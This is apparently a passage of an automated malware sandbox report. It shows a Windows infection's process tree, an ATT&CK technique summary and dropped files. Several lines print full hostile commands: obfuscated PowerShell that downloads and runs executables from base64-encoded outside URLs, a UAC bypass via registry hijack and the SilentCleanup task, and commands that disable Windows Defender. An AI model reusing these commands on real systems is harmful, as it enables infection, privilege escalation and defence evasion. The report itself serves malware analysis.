                                                "C:\Users\Admin\AppData\Local\Temp\PLSkebaejl.exe"
                                                10⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4484
                                                • C:\Users\Admin\AppData\Local\Temp\PLSkebaejl.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\PLSkebaejl.exe"
                                                  11⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2800
                                                  • \??\c:\windows\SysWOW64\cmstp.exe
                                                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\4q2v1231.inf
                                                    12⤵
                                                      PID:5792
                                                • C:\Users\Admin\AppData\Local\Temp\O5BG8Rd3za.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\O5BG8Rd3za.exe"
                                                  10⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:5456
                                                  • C:\Users\Admin\AppData\Local\Temp\O5BG8Rd3za.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\O5BG8Rd3za.exe"
                                                    11⤵
                                                    • Executes dropped EXE
                                                    PID:4516
                                                  • C:\Users\Admin\AppData\Local\Temp\O5BG8Rd3za.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\O5BG8Rd3za.exe"
                                                    11⤵
                                                    • Executes dropped EXE
                                                    • Windows security modification
                                                    PID:5516
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" Get-MpPreference -verbose
                                                      12⤵
                                                        PID:4336
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\epu.exe"
                                                    10⤵
                                                      PID:5144
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /T 10 /NOBREAK
                                                        11⤵
                                                        • Delays execution with timeout.exe
                                                        PID:5260
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                              6⤵
                                                PID:4184
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                                  7⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4640
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout 2
                                                6⤵
                                                • Delays execution with timeout.exe
                                                PID:2680
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                6⤵
                                                  PID:2704
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                                    7⤵
                                                    • Blocklisted process makes network request
                                                    PID:4764
                                                    • C:\Users\Public\riu.exe
                                                      "C:\Users\Public\riu.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: MapViewOfSection
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4348
                                                      • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: MapViewOfSection
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4280
                                                        • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                                                          10⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:4276
                                                      • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Checks whether UAC is enabled
                                                        • Maps connected drives based on registry
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: MapViewOfSection
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4468
                                                        • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                                                          10⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Checks processor information in registry
                                                          PID:4492
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 4492 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\451091511958641\\* & exit
                                                            11⤵
                                                              PID:3824
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /pid 4492
                                                                12⤵
                                                                • Kills process with taskkill
                                                                PID:4964
                                                        • C:\Users\Public\riu.exe
                                                          "C:\Users\Public\riu.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Drops desktop.ini file(s)
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:1940
                                                          • C:\Users\Admin\AppData\Local\Temp\hNqShoEbww.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\hNqShoEbww.exe"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • Maps connected drives based on registry
                                                            • Suspicious use of SetThreadContext
                                                            PID:4380
                                                            • C:\Users\Admin\AppData\Local\Temp\hNqShoEbww.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\hNqShoEbww.exe"
                                                              11⤵
                                                              • Executes dropped EXE
                                                              PID:4668
                                                          • C:\Users\Admin\AppData\Local\Temp\ff8snSa94T.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\ff8snSa94T.exe"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Checks whether UAC is enabled
                                                            • Maps connected drives based on registry
                                                            • Suspicious use of SetThreadContext
                                                            • Modifies system certificate store
                                                            PID:4248
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              "C:\Windows\System32\svchost.exe"
                                                              11⤵
                                                                PID:4760
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\BceDUtso.bat" "
                                                                  12⤵
                                                                    PID:5924
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg delete hkcu\Environment /v windir /f
                                                                      13⤵
                                                                      • Modifies registry key
                                                                      PID:3740
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                                                      13⤵
                                                                      • Modifies registry key
                                                                      PID:5152
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                                                      13⤵
                                                                        PID:5392
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg delete hkcu\Environment /v windir /f
                                                                        13⤵
                                                                        • Modifies registry key
                                                                        PID:4888
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\BceDUtso.bat" "
                                                                      12⤵
                                                                        PID:5460
                                                                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                      11⤵
                                                                        PID:5768
                                                                    • C:\Users\Admin\AppData\Local\Temp\tC4JTtEJBE.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\tC4JTtEJBE.exe"
                                                                      10⤵
                                                                      • Executes dropped EXE
                                                                      • Checks whether UAC is enabled
                                                                      • Maps connected drives based on registry
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4488
                                                                      • C:\Users\Admin\AppData\Local\Temp\tC4JTtEJBE.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\tC4JTtEJBE.exe"
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        PID:4060
                                                                      • C:\Users\Admin\AppData\Local\Temp\tC4JTtEJBE.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\tC4JTtEJBE.exe"
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4700
                                                                        • \??\c:\windows\SysWOW64\cmstp.exe
                                                                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\iiikfadx.inf
                                                                          12⤵
                                                                            PID:4692
                                                                      • C:\Users\Admin\AppData\Local\Temp\otLMES6PVH.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\otLMES6PVH.exe"
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Maps connected drives based on registry
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4428
                                                                        • C:\Users\Admin\AppData\Local\Temp\otLMES6PVH.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\otLMES6PVH.exe"
                                                                          11⤵
                                                                          • Executes dropped EXE
                                                                          • Windows security modification
                                                                          PID:4932
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "powershell" Get-MpPreference -verbose
                                                                            12⤵
                                                                              PID:4968
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\riu.exe"
                                                                          10⤵
                                                                            PID:4444
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /T 10 /NOBREAK
                                                                              11⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:5036
                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                    6⤵
                                                                    • Checks whether UAC is enabled
                                                                    PID:3108
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                                                      7⤵
                                                                      • Maps connected drives based on registry
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:2344
                                                        • C:\Windows\SysWOW64\DllHost.exe
                                                          C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          1⤵
                                                            PID:4352
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c start C:\Windows\temp\se44uy5j.exe
                                                              2⤵
                                                                PID:4544
                                                                • C:\Windows\temp\se44uy5j.exe
                                                                  C:\Windows\temp\se44uy5j.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:4052
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell" Get-MpPreference -verbose
                                                                    4⤵
                                                                      PID:3356
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                      4⤵
                                                                        PID:4316
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                        4⤵
                                                                          PID:4552
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                          4⤵
                                                                            PID:4328
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                            4⤵
                                                                              PID:3652
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                              4⤵
                                                                                PID:496
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                4⤵
                                                                                  PID:3900
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                  4⤵
                                                                                    PID:4396
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                    4⤵
                                                                                      PID:984
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                      4⤵
                                                                                        PID:5212
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                        4⤵
                                                                                          PID:5332
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                          4⤵
                                                                                            PID:5428
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                            4⤵
                                                                                              PID:5544
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /IM cmstp.exe /F
                                                                                          2⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:4828
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c start C:\Windows\temp\oias5uwc.exe
                                                                                          2⤵
                                                                                            PID:5864
                                                                                            • C:\Windows\temp\oias5uwc.exe
                                                                                              C:\Windows\temp\oias5uwc.exe
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4896
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" Get-MpPreference -verbose
                                                                                                4⤵
                                                                                                  PID:5480
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                  4⤵
                                                                                                    PID:5868
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                    4⤵
                                                                                                      PID:3984
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                                      4⤵
                                                                                                        PID:5708
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                        4⤵
                                                                                                          PID:5656
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                          4⤵
                                                                                                            PID:5680
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                            4⤵
                                                                                                              PID:1796
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                              4⤵
                                                                                                                PID:5908
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                4⤵
                                                                                                                  PID:5164
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                  4⤵
                                                                                                                    PID:5008
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                    4⤵
                                                                                                                      PID:4716
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                      4⤵
                                                                                                                        PID:5728
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                        4⤵
                                                                                                                          PID:4424
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /IM cmstp.exe /F
                                                                                                                      2⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5400
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c start C:\Windows\temp\eozefxuz.exe
                                                                                                                      2⤵
                                                                                                                        PID:6252
                                                                                                                        • C:\Windows\temp\eozefxuz.exe
                                                                                                                          C:\Windows\temp\eozefxuz.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4708
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell" Get-MpPreference -verbose
                                                                                                                            4⤵
                                                                                                                              PID:6272
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                              4⤵
                                                                                                                                PID:6056
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                4⤵
                                                                                                                                  PID:3652
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                  4⤵
                                                                                                                                    PID:4216
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                    4⤵
                                                                                                                                      PID:5788
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                      4⤵
                                                                                                                                        PID:7024
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                        4⤵
                                                                                                                                          PID:6084
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                          4⤵
                                                                                                                                            PID:6364
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                            4⤵
                                                                                                                                              PID:5276
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                              4⤵
                                                                                                                                                PID:4840
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                4⤵
                                                                                                                                                  PID:6420
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                  4⤵
                                                                                                                                                    PID:7072
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5956
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /IM cmstp.exe /F
                                                                                                                                                  2⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:6212

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                              Persistence

                                                                                                                                              Modify Existing Service

                                                                                                                                              3
                                                                                                                                              T1031

                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                              3
                                                                                                                                              T1060

                                                                                                                                              Hidden Files and Directories

                                                                                                                                              1
                                                                                                                                              T1158

                                                                                                                                              Privilege Escalation

                                                                                                                                              Bypass User Account Control

                                                                                                                                              1
                                                                                                                                              T1088

                                                                                                                                              Defense Evasion

                                                                                                                                              Modify Registry

                                                                                                                                              13
                                                                                                                                              T1112

                                                                                                                                              Disabling Security Tools

                                                                                                                                              3
                                                                                                                                              T1089

                                                                                                                                              Bypass User Account Control

                                                                                                                                              1
                                                                                                                                              T1088

                                                                                                                                              Install Root Certificate

                                                                                                                                              1
                                                                                                                                              T1130

                                                                                                                                              Hidden Files and Directories

                                                                                                                                              1
                                                                                                                                              T1158

                                                                                                                                              Credential Access

                                                                                                                                              Credentials in Files

                                                                                                                                              3
                                                                                                                                              T1081

                                                                                                                                              Discovery

                                                                                                                                              Query Registry

                                                                                                                                              5
                                                                                                                                              T1012

                                                                                                                                              System Information Discovery

                                                                                                                                              6
                                                                                                                                              T1082

                                                                                                                                              Security Software Discovery

                                                                                                                                              1
                                                                                                                                              T1063

                                                                                                                                              Peripheral Device Discovery

                                                                                                                                              1
                                                                                                                                              T1120

                                                                                                                                              Collection

                                                                                                                                              Data from Local System

                                                                                                                                              3
                                                                                                                                              T1005

                                                                                                                                              Impact

                                                                                                                                              Inhibit System Recovery

                                                                                                                                              1
                                                                                                                                              T1490

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\ProgramData\mozglue.dll
                                                                                                                                              • C:\ProgramData\nss3.dll
                                                                                                                                              • C:\ProgramData\nss3.dll
                                                                                                                                              • C:\ProgramData\nss3.dll
                                                                                                                                              • C:\ProgramData\sqlite3.dll
